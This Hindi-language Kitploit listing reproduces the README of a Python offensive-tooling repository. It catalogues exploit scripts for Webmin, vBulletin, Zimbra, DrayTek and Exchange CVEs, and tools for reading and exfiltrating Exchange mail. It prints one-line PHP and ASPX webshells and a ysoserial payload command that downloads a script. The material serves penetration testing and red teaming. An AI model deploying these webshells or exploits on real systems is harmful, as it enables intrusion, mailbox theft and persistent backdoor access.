Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
उपकरण/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

रिपॉजिटरी देखें
4121263 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Python-का-होमवर्क

मेरे ब्लॉग के Python कोड।

pptp_password_hack.py

PPTP VPN का पासवर्ड पाने के लिए ब्रूट-फोर्स हमले का उपयोग करें।

यह फ़ाइल (wordlist नामक) में पासवर्ड पढ़ेगा और फिर सर्वर से कनेक्ट करने के लिए pptpsetup का उपयोग करेगा।

समय अंतराल 10 सेकंड है।


portscan.py

पोर्ट स्कैन करने के लिए उपयोग करें।

टाइमआउट 3 सेकंड है।

c++ संस्करण:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

URL से IP प्राप्त करने के लिए उपयोग करें।

मैं Sublist3r के परिणाम को सीधे उपयोग कर सकता हूँ।

file_deduplication(For_urltoip).py

Sublist3r के परिणाम से डुप्लिकेट IP हटाने के लिए उपयोग करें।

मैं urltoip.py के परिणाम को सीधे उपयोग कर सकता हूँ।

Sublime(F9) का उपयोग करके IP को क्रमबद्ध किया जा सकता है।


file_deduplication.py

फ़ाइल से डुप्लिकेट आइटम हटाने के लिए उपयोग करें।

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

संदर्भ:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।

आप 100 परिणाम प्राप्त कर सकते हैं।

fofa_api_VIP.py

fofa का API कॉल करने और परिणामों से IP प्रिंट करने के लिए उपयोग किया जाता है।

यदि आप VIP हैं, तो आपको 10000 परिणाम मिलेंगे।


vBulletin_5.x_0day_pre-auth_RCE.py

संदर्भ:

https://seclists.org/fulldisclosure/2019/Sep/31

उदा.

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

संदर्भ:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

उदा.

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Firefox का पासवर्ड निर्यात करने के लिए उपयोग करें

get_Exchange_version.py

Exchange का संस्करण प्राप्त करने के लिए उपयोग करें।

पहले URL के सोर्स कोड से BuildNumber प्राप्त करें और फिर संस्करण प्राप्त करें।

संदर्भ:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

SMBv3 RCE भेद्यता को स्कैन करने के लिए उपयोग करें।

टाइमआउट 3 सेकंड है।


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

संदर्भ:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, तथा Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, और 1.4.4_Beta डिवाइस cgi-bin/mainfunction.cgi URI.. पर shell मेटाकैरेक्टर के माध्यम से बिना प्रमाणीकरण के रूट के रूप में रिमोट कोड निष्पादन की अनुमति देते हैं।

प्रभावित उत्पाद:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Zimbra मेल सर्वर से कनेक्ट करने के लिए Zimbra SOAP API का उपयोग करें।

उपयोग:

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

मोड:

  • low निम्न टोकन के लिए प्रमाणीकरण
  • admin एडमिन टोकन के लिए प्रमाणीकरण
  • ssrf एडमिन टोकन प्राप्त करने के लिए CVE-2019-9621 का उपयोग करें

उदा:

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Exchange Web Service के वैध खाते की जाँच करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

संदर्भ:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

उपयोग:

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

उदा.

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Autodiscover.xml तक पहुँचने और उपयोगकर्ता की कॉन्फ़िगरेशन प्राप्त करने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

उपयोग:

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

उदा.

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

checkAutodiscover.py का अतिरिक्त मोड

पैरामीटर जोड़ें

ewsManage.py

Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

उपयोग:

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


उदा.

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

SSH की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें (पासवर्ड और privatekeyfile समर्थन)

उपयोग:

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

उदा.

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

SSH के माध्यम से रिमोट कमांड निष्पादन (पासवर्ड और privatekeyfile समर्थन)

उपयोग:

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

उदा.

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

eas (Exchange Server ActiveSync) की वैध क्रेडेंशियल जाँचने के लिए उपयोग करें

उपयोग:

root@kitploit:~
easCheck.py <host> <user> <password>

उदा.

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

OWA से कनेक्ट करके Exchange के वैध खाते की जाँच करने के लिए उपयोग करें।

उपयोग:

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

OWA से कनेक्ट करके मेल पढ़ने के लिए उपयोग करें।

उपयोग:

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

मेल सर्वर से कनेक्ट करने के लिए IMAP का उपयोग करें।

उपयोग:

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

execCmd.aspx के साथ NTLM प्रमाणीकरण लागू करने और संचार करने के लिए उपयोग करें

संचार डेटा Base64 के साथ एन्कोड किया जाता है

उपयोग:

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

C sharp संस्करण: SharpExchangeBackdoor.cs

Exchange वेबशेल बैकडोर पर पेलोड भेजने के लिए उपयोग करें।

समर्थन:

  • assemblyLoad
  • webshellWrite

उपयोग:

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

उदा.

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

असुरक्षित ऑब्जेक्ट डिसीरियलाइज़ेशन - IMAP

उपयोग:

root@kitploit:~
<url> <user> <password> <payload path>

उदा.

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

नोट:

आप payload.obj इस प्रकार बना सकते हैं:

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Exchange के डिसीरियलाइज़िंग कोड निष्पादन का परीक्षण करने के लिए उपयोग करें।
Exchange फ़ाइलों की पढ़ने और लिखने की अनुमतियों से लेकर डिसीरियलाइज़िंग कोड निष्पादन तक। डिसीरियलाइज़िंग कोड निष्पादन लागू करने के लिए आपको %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config में machineKey संशोधित करना चाहिए। <path>:owa या ecp

उपयोग:

root@kitploit:~
    <url> <key> <path>

उदा.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Exchange SOAP XML संदेश पार्स करने के लिए उपयोग करें।


eacManage.py

Exchange एडमिन सेंटर तक पहुँचने के लिए उपयोग करें

उपयोग:

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

VM प्रबंधित करने के लिए vSphere Automation API(v7.0U1+) का उपयोग करें

Windows और Linux VM समर्थन

vSphereWebServicesAPI_Manage.py

VM प्रबंधित करने के लिए vSphere Web Services API का उपयोग करें

संदर्भ: https://github.com/vmware/pyvmomi/

स्थापना: pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

vCenter पर LDAP डेटाबेस प्रबंधित करने के लिए उपयोग करें।


SolarWindsOrion_Manage.py

SolarWinds Orion प्लेटफ़ॉर्म प्रबंधित करने के लिए उपयोग करें

SolarWindsOrionAPI_Manage.py

Orion प्लेटफ़ॉर्म प्रबंधित करने के लिए SolarWinds Orion API का उपयोग करें


MailEnableManage.py

MailEnable मेल सर्वर प्रबंधित करने के लिए उपयोग करें


blind_XXEPlatform_CVE-2019-9670.py

यह HTTP या FTP प्रोटोकॉल के माध्यम से परिणाम प्राप्त करने का समर्थन करता है।


ewsManage_Downloader.py

Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

ewsManage_exchangelib_Downloader.py

Exchange Web Service तक पहुँचने के लिए उपयोग करें (plaintext और ntlmhash समर्थन)

ewsManage_requests_ntlm_Downloader.py

Exchange Web Service तक पहुँचने के लिए requests_ntlm2 का उपयोग करें (plaintext और ntlmhash समर्थन)

ewsManage_requests_ntlm_Session_Downloader.py

Exchange Web Service तक पहुँचने के लिए requests_ntlm2 का उपयोग करें (plaintext और ntlmhash समर्थन)

संचार डेटा कम करने के लिए session का उपयोग करें


vCenter_ExtraCertFromMdb.py

https://github.com/horizon3ai/vcenter_saml_login से संशोधित

vCenter_GenerateLoginCookie.py

https://github.com/horizon3ai/vcenter_saml_login से संशोधित


Exchange_GetVersion_MatchVul.py

Exchange का संस्करण प्राप्त करने और मौजूदा भेद्यताओं से मिलान करने के लिए उपयोग करें

Exchange_GetVersion_ParseFromFile.py

Exchange का संस्करण प्राप्त करने और https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 से संस्करण पार्स करने के लिए उपयोग करें

आपको https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 को exchange.data के रूप में सहेजना चाहिए

Exchange_GetVersion_ParseFromWebsite.py

Exchange का संस्करण प्राप्त करने और https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 से संस्करण पार्स करने के लिए उपयोग करें


Exchange_GetInternalIP.py

Exchange का आंतरिक IP प्राप्त करने के लिए उपयोग करें

msf auxiliary/scanner/http/owa_iis_internal_ip पर आधारित, लेकिन अधिक Exchange सर्वरों का समर्थन करता है।


vRealizeOperationsManager_GetVersion.py

vRealize Operations Manager का संस्करण प्राप्त करने के लिए उपयोग करें


BIG-IP_RunBash.py

कमांड चलाने के लिए bash का उपयोग करें


SophosUTM_plxDecrypter.py

Sophos UTM की .plx फ़ाइल डिक्रिप्ट करने के लिए उपयोग करें

संदर्भ:

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Sophos UTM की कॉन्फ़िगरेशन पार्स करने के लिए उपयोग करें


टूल डाउनलोड करें